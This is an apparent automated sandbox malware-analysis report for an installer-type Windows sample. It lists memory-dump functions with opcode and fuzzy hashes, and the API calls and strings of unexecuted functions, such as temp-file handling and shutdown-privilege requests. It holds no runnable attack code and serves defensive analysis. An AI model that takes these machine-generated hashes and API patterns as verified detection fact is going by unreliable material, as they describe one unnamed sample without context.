                                                                                • Opcode ID: d69f0ab0d4ff1ad91ad407e7ee66e9d52b9e02c9cf90653b7fd51d004108cde1
                                                                                • Instruction ID: 17f2722903a38deb06beed6ca2eac85d5c8be66c25e437712cf3165b76c069f0
                                                                                • Opcode Fuzzy Hash: d69f0ab0d4ff1ad91ad407e7ee66e9d52b9e02c9cf90653b7fd51d004108cde1
                                                                                • Instruction Fuzzy Hash: BC113372E043599FCB01DBF89C008EEBB70FF8A210B258397E526B7151EA312906C7A0
                                                                                Function 0016FDC7 Relevance: .1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c3526fc7e8cb6baac55d9527b0a4b5a3df3df05d8c9d558fa8c7cb3be69818db
                                                                                • Instruction ID: 0722ce6b8fdb0455b27da03d11a9790ae96dd677286d06e6d2fa236e0327cbe1
                                                                                • Opcode Fuzzy Hash: c3526fc7e8cb6baac55d9527b0a4b5a3df3df05d8c9d558fa8c7cb3be69818db
                                                                                • Instruction Fuzzy Hash: C6210671D002198BDB15CBA9E9406EEBBF2BF88700F16843DD402B7351DB726C568BD0
                                                                                Function 001639ED Relevance: .1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 77c27f31bdfab2e1a78f1259caaecb36b4559da77aedd4827269c90360c99c50
                                                                                • Instruction ID: 3538b08da2adf06fbc3f7c211e4c998d2618966d0effc5d282091e236309c6b1
                                                                                • Opcode Fuzzy Hash: 77c27f31bdfab2e1a78f1259caaecb36b4559da77aedd4827269c90360c99c50
                                                                                • Instruction Fuzzy Hash: 2231B478E11209CFCB48DFE4E59489DBBB6FF49714B205569E819AB320DB31AD06DF40
                                                                                Function 00164DBB Relevance: .1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 33a6f1294c316c1ed8179baeb25c1e9a5d05963cedd9b7bad92821361f3bbf17
                                                                                • Instruction ID: 657176e5da35883b4ad7370e8856612f16bdcd66ef2757a85642980ee61650c7
                                                                                • Opcode Fuzzy Hash: 33a6f1294c316c1ed8179baeb25c1e9a5d05963cedd9b7bad92821361f3bbf17
                                                                                • Instruction Fuzzy Hash: 1A21D5316081459FDB05AFA4E85566B3BA2FF84314F104069F9058B791CB39CE66DBE1
                                                                                Function 37B9FA29 Relevance: .1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 663323fa4463f3bf530968b213648d676dc7f507ddb86b47bdff0e92375f7b40
                                                                                • Instruction ID: fc0894b94bf57bd04b9a1848aff56325951f662a96ec7c7028f42bae3761ba4a
                                                                                • Opcode Fuzzy Hash: 663323fa4463f3bf530968b213648d676dc7f507ddb86b47bdff0e92375f7b40
                                                                                • Instruction Fuzzy Hash: 39110C303053408FE7090B7A5C146BBBEBB9FC7220B45447BE545C7296CD288D0A8371
                                                                                Function 000AD03F Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908449501.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 400ab5ba67ea5fbaa9a1fef8e5586e0ec150e2d8e661167b00a0c786dbe51cf7
                                                                                • Instruction ID: 2ac1206c8a20f716de8d8a1f10d7cbbd0ec72cf0d858a2dba1de294606dd0a40
                                                                                • Opcode Fuzzy Hash: 400ab5ba67ea5fbaa9a1fef8e5586e0ec150e2d8e661167b00a0c786dbe51cf7
                                                                                • Instruction Fuzzy Hash: C611DD75504280DFCB11CF50C9C4B15BBA2FB89314F24CAAEE84A4B652C33AD84ACF62
                                                                                Function 00165607 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 43984aa8355851ca5fdbc95cd0527a15602025ad7ced954191b207720f6e9b02
                                                                                • Instruction ID: e70cdaba5b5629ba5becae2252b37665dd8055ed01ff4632a5c6b2323a6e825a
                                                                                • Opcode Fuzzy Hash: 43984aa8355851ca5fdbc95cd0527a15602025ad7ced954191b207720f6e9b02
                                                                                • Instruction Fuzzy Hash: C001F132A001146FDF019E689C20AEF3BE7DFC8340F58802AF905D3691DB318E12ABA1
                                                                                Function 00161F08 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1774cba11314e32f3aef0adf16d27e91b73dc11d9e63fc58352ba2f1eb72c27e
                                                                                • Instruction ID: 6cb0c8bc2ea0cc98d1644215f910d8720a14906bf8ddf86dfcd33f1b9fe7a7a1
                                                                                • Opcode Fuzzy Hash: 1774cba11314e32f3aef0adf16d27e91b73dc11d9e63fc58352ba2f1eb72c27e
                                                                                • Instruction Fuzzy Hash: EC211474D046098FCB11EFA8D8445EEBFB0FF49304F1441AAD805B7264EB315A95CBA1
                                                                                Function 37B951D0 Relevance: .1, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c02c293f6fd436efeff61eec56566bd8e8551dd355d3091decb3a953046da78d
                                                                                • Instruction ID: 2a68f98d77969ac3beecf3a41ce526e5076c82e514c6cc2120afab9c736bd1a5
                                                                                • Opcode Fuzzy Hash: c02c293f6fd436efeff61eec56566bd8e8551dd355d3091decb3a953046da78d
                                                                                • Instruction Fuzzy Hash: 1401C075A013148FD741DF78E40869A7BF4EF4E65070501BAE815DB321EB35CD018BA0
                                                                                Function 0016FDA3 Relevance: .0, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 37509c9d08dd6cfe6f7ef82b24c2bd9bf647adc14cff59fe028828a67e2daae8
                                                                                • Instruction ID: 4cbebd6201602fca4e8895e6ff14b6d04f5b5ce628844f52e84af9588e1938cf
                                                                                • Opcode Fuzzy Hash: 37509c9d08dd6cfe6f7ef82b24c2bd9bf647adc14cff59fe028828a67e2daae8
                                                                                • Instruction Fuzzy Hash: 551104319042068FDF12DF64E9407ADBBF1BF84B00F16462AD402AB263DB32AC56CBD1
                                                                                Function 37B95278 Relevance: .0, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 26ad1aa84690d94cb7bf06ac193a718b1f30f4454344259970541f353de18a66
                                                                                • Instruction ID: 8e53d573e2497e0195ca75cad1b1edbdc77d698880427c0dbcfbb5c658a075ea
                                                                                • Opcode Fuzzy Hash: 26ad1aa84690d94cb7bf06ac193a718b1f30f4454344259970541f353de18a66
                                                                                • Instruction Fuzzy Hash: 07F0F97AB84618CBA701D768E4405D977B0EF8D672F040272E925FB791DB21DA1587D0
                                                                                Function 37B94C80 Relevance: .0, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6756359c7e299570dae3eea2859377cf5302e9b4207b8023ed5eb5ac22fe74e6
                                                                                • Instruction ID: 6610e8d6701d502cedab488c9c7eb1e9be3a696a78dd9491d88e054393bb5d13
                                                                                • Opcode Fuzzy Hash: 6756359c7e299570dae3eea2859377cf5302e9b4207b8023ed5eb5ac22fe74e6
                                                                                • Instruction Fuzzy Hash: CEF0E9363043049FE3049B2ED8549973BFAEF86658B5500B6F505CB372DA61DC05CBA0
                                                                                Function 37B95148 Relevance: .0, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1b246089ffed25b05d8913388fcfbc0ebf247eb6e4830e71ecc7d75b70703905
                                                                                • Instruction ID: eba436ba3037cccb0dcaa760c50ad90df441ef108b10ef89d3e55b82ae250b88
                                                                                • Opcode Fuzzy Hash: 1b246089ffed25b05d8913388fcfbc0ebf247eb6e4830e71ecc7d75b70703905
                                                                                • Instruction Fuzzy Hash: DB01A471E40329DFDB44EFB9D8006EEBBF5AF49210F50857AD429E7290EB3599018B90
                                                                                Function 37B94C90 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d370484c217d45e93543b3c1ce34f3fc4d9c5e43aa7d375e12004f41de80d0a4
                                                                                • Instruction ID: d65cb018a01444d2958016f7618ad21bf40f4c923d21668bbe15ced0344db017
                                                                                • Opcode Fuzzy Hash: d370484c217d45e93543b3c1ce34f3fc4d9c5e43aa7d375e12004f41de80d0a4
                                                                                • Instruction Fuzzy Hash: 37F012353002148FE7089B2AE85896A77BAEFC5765B158079F505CB361DE71DC01CBA0
                                                                                Function 0016D45B Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d470fed6a6086ec98b2a39eee5b6132c4921f9e1710f78132bf7ddb36a1d56d3
                                                                                • Instruction ID: da499e8809853881026c731940572ab7644271eb79df3e176099867e6a619570
                                                                                • Opcode Fuzzy Hash: d470fed6a6086ec98b2a39eee5b6132c4921f9e1710f78132bf7ddb36a1d56d3
                                                                                • Instruction Fuzzy Hash: BBE02630D04208ABEF049BA5FC083FAB7B4ABCB301F406436D104B3150CFB46925CAA1
                                                                                Function 0016DF1B Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41e7791a4a19c9c403342aa635172917a588a5792d14830c283c9f6e59823aae
                                                                                • Instruction ID: 45daf4494ba6e99d9877352f6a890086839a6f1c2ba7b639796dbca7b87f31e7
                                                                                • Opcode Fuzzy Hash: 41e7791a4a19c9c403342aa635172917a588a5792d14830c283c9f6e59823aae
                                                                                • Instruction Fuzzy Hash: 01E02034D04204AFDF049BA5FC153FAB7B4A7CB301F406461D104B3191CBB4052A8695
                                                                                Function 00162010 Relevance: .0, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bb6ba974fabdb3244b88a8e56602866b95fca87fa5e1bc336d4af9fbd5491f3f
                                                                                • Instruction ID: e3da0be674589eae1f4d84d30a115f644094c927dc9b48613ffb5eb2b13bcd45
                                                                                • Opcode Fuzzy Hash: bb6ba974fabdb3244b88a8e56602866b95fca87fa5e1bc336d4af9fbd5491f3f
                                                                                • Instruction Fuzzy Hash: C2E02236C1036A8FCB0297B0DC004DEBB74EEC3620B0201A7C020AB012E7712A0EC7B1
                                                                                Function 0016D4BC Relevance: .0, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c04716c9e10e3ee9caf6f601e434b4299b8783d5ab997a31f4dae2b463c744f0
                                                                                • Instruction ID: 3eef78f0af7778a0031327155c98bc0b7a0cbdc095cec8d4db5f75273768acd6
                                                                                • Opcode Fuzzy Hash: c04716c9e10e3ee9caf6f601e434b4299b8783d5ab997a31f4dae2b463c744f0
                                                                                • Instruction Fuzzy Hash: 8EE02692E0C1408BD7148BF57C121B9BF30EED734270654C7C049EB9A5DB28EA26DB12
                                                                                Function 00165EA7 Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46230c6576f09c6666d827a54c174dfa702f85fec6c5f6af570d8f38acefd34b
                                                                                • Instruction ID: d11da9fb24fcdfb0a84ed2d52bf0daba4ff4710a819ec5e558ec3020c0de8a8d
                                                                                • Opcode Fuzzy Hash: 46230c6576f09c6666d827a54c174dfa702f85fec6c5f6af570d8f38acefd34b
                                                                                • Instruction Fuzzy Hash: B4E0C2300243889FDF4293B9B8640C23BE97AC3304B425062A8408A623AE20194FA792
                                                                                Function 00162020 Relevance: .0, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a4c99ad3649600f9b5dcf4a8105e653c47af06e54099cd9b66a32d89472294df
                                                                                • Instruction ID: cadcff72579d7f552519d570ba00b008b5b76ef7f05123bd900fe4f392f2191d
                                                                                • Opcode Fuzzy Hash: a4c99ad3649600f9b5dcf4a8105e653c47af06e54099cd9b66a32d89472294df
                                                                                • Instruction Fuzzy Hash: CED05E32E2022B97CB00EBA5EC048EFF738EED6661B908626D52537140FB713659C7E1
                                                                                Function 00168253 Relevance: .0, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fba56a466bd5a15a1fedf65a1ba51a013d20f430b371c1242ffa57bb0aeff7c1
                                                                                • Instruction ID: 15746f94ec8a9702e9266ac7bfb89937060fdbafae86b01726beacb09c630669
                                                                                • Opcode Fuzzy Hash: fba56a466bd5a15a1fedf65a1ba51a013d20f430b371c1242ffa57bb0aeff7c1
                                                                                • Instruction Fuzzy Hash: DEC0123754D0246EA625108E3C909F6578CD3D53B5A250277F91CE7350A9028C9153B5
                                                                                Function 0016A70D Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b4747c4867f2bb71e145a04dcb6a883ea89bcecd6199d5859db0e74f74aef0a
                                                                                • Instruction ID: 5fbba934a152f7f72bc6cf9883794e6cda08feb0f76b3d6bb0f05a2a7aba3fd7
                                                                                • Opcode Fuzzy Hash: 9b4747c4867f2bb71e145a04dcb6a883ea89bcecd6199d5859db0e74f74aef0a
                                                                                • Instruction Fuzzy Hash: 88D0677AB000089BDB049F98EC409DDF776FB98221B448126EA15A3260C7319966DB90
                                                                                Function 0016FBF3 Relevance: .0, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9c1f7aeed0dae39400052379090b116168eb7d50bcbecd906b3032decfad9aba
                                                                                • Instruction ID: 5c44104f76df901f9e3f245ff51db05b19f341b3709cc4a4f0da23c3a228d056
                                                                                • Opcode Fuzzy Hash: 9c1f7aeed0dae39400052379090b116168eb7d50bcbecd906b3032decfad9aba
                                                                                • Instruction Fuzzy Hash: F2D06C78E041188BCB20EFE4EA456ECB7B0AB99311F0114E69809B2610DB306AA48F12
                                                                                Function 00165EB8 Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 22b6124fdbeb7ea513c5cc4b2d98a48a5fa9b74587ff1dd84997b20dc7e60660
                                                                                • Instruction ID: 7a2aeeccd8cfeb8f9dd0ad9cfb77d1f7f46bd2a3887c1e5c02112ec5b46a61d2
                                                                                • Opcode Fuzzy Hash: 22b6124fdbeb7ea513c5cc4b2d98a48a5fa9b74587ff1dd84997b20dc7e60660
                                                                                • Instruction Fuzzy Hash: 36C0123012435D87DD45E7F9F95559573AA7BC0604F808410B90519725DF7025868BD7

                                                                                Non-executed Functions

                                                                                Function 0040322B Relevance: 79.1, APIs: 33, Strings: 12, Instructions: 357stringcomfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32 ref: 00403250
                                                                                • GetVersion.KERNEL32 ref: 00403256
                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
                                                                                • #17.COMCTL32(00000007,00000009), ref: 004032A1
                                                                                • OleInitialize.OLE32(00000000), ref: 004032A8
                                                                                • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
                                                                                • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
                                                                                • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 004032EC
                                                                                • CharNextA.USER32(00000000,00429000,00000020), ref: 00403317
                                                                                • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 00403414
                                                                                • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 00403425
                                                                                • lstrcatA.KERNEL32(0042A400,\Temp), ref: 00403431
                                                                                • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 00403445
                                                                                • lstrcatA.KERNEL32(0042A400,Low), ref: 0040344D
                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 0040345E
                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 00403466
                                                                                • DeleteFileA.KERNEL32(0042A000), ref: 0040347A
                                                                                  • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                  • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                • OleUninitialize.OLE32(?), ref: 00403528
                                                                                • ExitProcess.KERNEL32 ref: 00403549
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
                                                                                • ExitProcess.KERNEL32 ref: 004036EB
                                                                                  • Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                • String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                • API String ID: 3329125770-3941163293
                                                                                • Opcode ID: 5cb2cc3bf3739c0bfc0faa22fbc89fc69d5f2e95d9de7fdc040616a0820f4b48
                                                                                • Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
                                                                                • Opcode Fuzzy Hash: 5cb2cc3bf3739c0bfc0faa22fbc89fc69d5f2e95d9de7fdc040616a0820f4b48
                                                                                • Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E
                                                                                Function 004049F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404A11
                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404A1C
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
                                                                                • LoadBitmapA.USER32(0000006E), ref: 00404A79
                                                                                • SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
                                                                                • DeleteObject.GDI32(00000000), ref: 00404AEF
                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404C29
                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404C48
                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404E18
                                                                                • GlobalFree.KERNEL32(?), ref: 00404E28
                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
                                                                                • ShowWindow.USER32(?,00000000), ref: 00404FC7
                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404FD2
                                                                                • ShowWindow.USER32(00000000), ref: 00404FD9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 1638840714-813528018
                                                                                • Opcode ID: 15a37990a4bcb7d4f00004ad7ffbb4e2a3366f8b7a6d6f4bc83ccadd7c11290a
                                                                                • Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
                                                                                • Opcode Fuzzy Hash: 15a37990a4bcb7d4f00004ad7ffbb4e2a3366f8b7a6d6f4bc83ccadd7c11290a
                                                                                • Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58
                                                                                Function 00405705 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(?,?,75DF3410,75DF2EE0,00000000), ref: 0040572E
                                                                                • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 00405776
                                                                                • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 00405797
                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 0040579D
                                                                                • FindFirstFileA.KERNEL32(00420D38,?,?,?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 004057AE
                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
                                                                                • FindClose.KERNEL32(00000000), ref: 0040586C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: 8B$\*.*
                                                                                • API String ID: 2035342205-1085368084
                                                                                • Opcode ID: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
